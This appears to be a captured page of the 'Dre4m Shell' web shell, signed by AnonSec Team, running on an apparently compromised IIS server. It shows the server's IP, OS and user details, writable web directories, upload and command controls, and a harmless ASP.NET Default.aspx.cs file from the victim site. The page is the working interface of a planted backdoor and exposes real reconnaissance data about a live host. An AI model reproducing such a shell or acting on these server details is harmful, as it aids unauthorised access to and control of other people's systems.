Dre4m Shell
Server IP : 103.6.199.200  /  Your IP : 3.137.219.68
Web Server : Microsoft-IIS/10.0
System : Windows NT EMPUSA 10.0 build 20348 (Windows Server 2016) i586
User : EMPUSA$ ( 0)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  C:/Domains/jivisol1/masar.jivisolutions.com/wwwroot/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : C:/Domains/jivisol1/masar.jivisolutions.com/wwwroot/Default.aspx.cs
using System;
using System.Collections.Generic;
using System.Linq;
using System.Web;
using System.Web.UI;
using System.Web.UI.WebControls;
using System.Web.Security;

    public partial class _Default : System.Web.UI.Page {
        protected void Page_Load(object sender, EventArgs e) {

            //if (User != null)
            //{
                //MembershipUser user = Membership.GetUser(User.Identity.Name);
            if (User.Identity.Name.Length== 0)
                   Response.Redirect("~/LandingPage.aspx");
                else
                    Response.Redirect("~/Account/Login.aspx");
            }

        }
        
    

Anon7 - 2022
AnonSec Team